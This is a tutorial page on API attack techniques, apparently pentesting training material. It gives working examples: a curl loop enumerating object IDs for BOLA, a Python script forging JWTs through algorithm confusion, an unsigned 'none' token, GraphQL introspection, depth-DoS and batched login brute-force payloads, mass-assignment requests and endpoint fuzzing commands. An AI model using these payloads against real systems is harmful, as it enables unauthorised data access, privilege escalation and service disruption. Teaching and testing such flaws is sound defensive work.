API Security Attacks NEW
APIs are the backbone of modern applications. Mobile apps, SPAs, microservices, third-party integrations—everything talks through APIs. And they're often the weakest link: less scrutinized than web apps, more powerful than user interfaces, and frequently exposing internal logic directly.
The most critical API vulnerabilities: Broken Object Level Authorization (BOLA), Broken Authentication, Broken Object Property Level Authorization, Unrestricted Resource Consumption, Broken Function Level Authorization, Server Side Request Forgery, Security Misconfiguration, Lack of Protection from Automated Threats, Improper Inventory Management, Unsafe Consumption of APIs.
The API Attack Surface
┌─────────────────────────────────────────────────────────────────────────────┐
│ API ATTACK VECTORS │
├─────────────────────────────────────────────────────────────────────────────┤
│ │
│ AUTHENTICATION AUTHORIZATION DATA EXPOSURE │
│ ┌─────────────────┐ ┌─────────────────┐ ┌─────────────────┐ │
│ │ • JWT Attacks │ │ • BOLA/IDOR │ │ • Excessive │ │
│ │ • Token Theft │ │ • BFLA │ │ Data Return │ │
│ │ • Credential │ │ • Mass │ │ • Sensitive │ │
│ │ Stuffing │ │ Assignment │ │ Fields in │ │
│ │ • Weak Keys │ │ • Privilege │ │ Response │ │
│ └─────────────────┘ │ Escalation │ │ • Verbose │ │
│ └─────────────────┘ │ Errors │ │
│ INJECTION RATE LIMITING └─────────────────┘ │
│ ┌─────────────────┐ ┌─────────────────┐ │
│ │ • SQL/NoSQL │ │ • Brute Force │ GRAPHQL │
│ │ • Command │ │ • DoS │ ┌─────────────────┐ │
│ │ • SSRF │ │ • Enumeration │ │ • Introspection │ │
│ │ • XSS │ │ • Scraping │ │ • Query Depth │ │
│ └─────────────────┘ └─────────────────┘ │ • Batching │ │
│ └─────────────────┘ │
└─────────────────────────────────────────────────────────────────────────────┘
BOLA - Broken Object Level Authorization
The #1 API vulnerability. APIs expose object IDs in requests, and fail to verify the user is authorized to access that specific object. Change the ID, access another user's data.
# Normal request - get your own order
GET /api/v1/orders/12345
Authorization: Bearer eyJhbGc...
Response: { "order_id": 12345, "user": "victim", "items": [...], "total": 150.00 }
# BOLA Attack - change the ID
GET /api/v1/orders/12346
Authorization: Bearer eyJhbGc... (same token, different object)
Response: { "order_id": 12346, "user": "other_user", "items": [...], "total": 500.00 }
# API returned another user's order without checking authorizationFinding BOLA Vulnerabilities
# Enumerate object IDs
for id in $(seq 1 1000); do
response=$(curl -s -o /dev/null -w "%{http_code}" \
-H "Authorization: Bearer $TOKEN" \
"https://api.target.com/api/v1/users/$id")
if [ "$response" = "200" ]; then
echo "[+] Accessible: User ID $id"
fi
done
# Look for predictable patterns:
# - Sequential integers: 1, 2, 3...
# - UUIDs (harder but sometimes predictable)
# - Base64 encoded IDs (decode and modify)
# - Hashed IDs (if weak hash, may be reversible)Automatically tests authorization by replaying requests with different user tokens.
BApp Store → Autorize → Enable with low-priv and high-priv sessions
JWT (JSON Web Token) Attacks
JWTs are stateless authentication tokens. When implemented poorly, they're goldmines for attackers.
Algorithm Confusion Attack
import jwt
import base64
# Original token uses RS256 (asymmetric)
# Server verifies with PUBLIC key
# Attack: Change algorithm to HS256 (symmetric)
# Server now verifies with PUBLIC key as HMAC secret
# Attacker signs with the PUBLIC key (which is... public)
# Get the public key (often exposed)
public_key = """-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA...
-----END PUBLIC KEY-----"""
# Forge token with HS256, signed with public key
forged_payload = {
"user_id": 1,
"role": "admin",
"exp": 9999999999
}
forged_token = jwt.encode(
forged_payload,
public_key,
algorithm='HS256'
)
# Server accepts it because:
# 1. Token says "alg": "HS256"
# 2. Server uses public key to verify HMAC
# 3. We signed with public key
# 4. Signature matches!None Algorithm Attack
# Original JWT
eyJhbGciOiJSUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoibm9ybWFsIn0.signature
# Decode header: {"alg":"RS256","typ":"JWT"}
# Decode payload: {"user":"normal"}
# Attack: Change algorithm to "none", remove signature
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0.eyJ1c2VyIjoiYWRtaW4ifQ.
# Decoded header: {"alg":"none","typ":"JWT"}
# Decoded payload: {"user":"admin"}
# Signature: (empty)
# Vulnerable servers accept unsigned tokens!All-in-one JWT testing tool: crack secrets, test algorithms, tamper payloads.
python3 jwt_tool.py <JWT> -T -M at
GraphQL Attacks
GraphQL is powerful and flexible—which means more ways to abuse it. Introspection exposes the schema, batching enables brute force, and nested queries cause DoS.
Introspection Query
# Full introspection query - reveals entire API schema
{
__schema {
types {
name
fields {
name
type {
name
}
args {
name
type {
name
}
}
}
}
queryType { name }
mutationType { name }
}
}
# Response reveals:
# - All types (User, Order, Payment, InternalConfig...)
# - All fields (password, ssn, creditCard, apiKey...)
# - All mutations (deleteUser, updateRole, transferFunds...)
# - Arguments and their typesQuery Depth Attack (DoS)
# Deeply nested query causes exponential database queries
{
users {
friends {
friends {
friends {
friends {
friends {
name
email
orders {
items {
product {
reviews {
author {
friends { ... } # Keep nesting
}
}
}
}
}
}
}
}
}
}
}
}
# Result: Server runs millions of queries, crashesBatching Attack (Brute Force)
# Single request, 1000 login attempts
# Bypasses rate limiting that counts requests
[
{ "query": "mutation { login(user:\"admin\", pass:\"password1\") { token } }" },
{ "query": "mutation { login(user:\"admin\", pass:\"password2\") { token } }" },
{ "query": "mutation { login(user:\"admin\", pass:\"password3\") { token } }" },
# ... 997 more
]
# One HTTP request = 1000 authentication attempts
# Rate limiter sees: 1 request per minute ✓Visualize GraphQL schemas as interactive graphs.
apis.guru/graphql-voyagerMass Assignment
APIs that blindly bind request parameters to object properties. Send extra fields, modify things you shouldn't.
# Normal profile update request
PUT /api/users/me
Content-Type: application/json
{
"name": "John Doe",
"email": "john@example.com"
}
# Mass assignment attack - add extra fields
PUT /api/users/me
Content-Type: application/json
{
"name": "John Doe",
"email": "john@example.com",
"role": "admin", # Not in UI, but API accepts it
"isVerified": true, # Bypass email verification
"balance": 999999, # Free money
"subscription": "premium" # Free upgrade
}
# Vulnerable API: "Oh, you want to update role? Sure!"API Enumeration & Discovery
Finding Hidden Endpoints
# Check for common API documentation
curl -s https://target.com/swagger.json
curl -s https://target.com/api/swagger.json
curl -s https://target.com/openapi.json
curl -s https://target.com/api-docs
curl -s https://target.com/v1/api-docs
curl -s https://target.com/graphql?query={__schema{types{name}}}
# Check for version endpoints
for v in v1 v2 v3 v4 api api/v1 api/v2; do
curl -s -o /dev/null -w "%{http_code} $v\n" "https://target.com/$v/users"
done
# Wordlist fuzzing for endpoints
ffuf -w /usr/share/wordlists/api-endpoints.txt \
-u https://target.com/api/FUZZ \
-H "Authorization: Bearer $TOKEN"Content discovery tool designed specifically for APIs.
kr scan https://target.com -w routes-large.kite
Essential API Testing Tools
Industry standard for API testing. Extensions: Autorize, JWT Editor, GraphQL Raider.
Build, test, and automate API requests. Great for manual testing.
Free automated API security scanner with OpenAPI import.
Find hidden GET/POST parameters in APIs.
arjun -u https://api.target.com/endpoint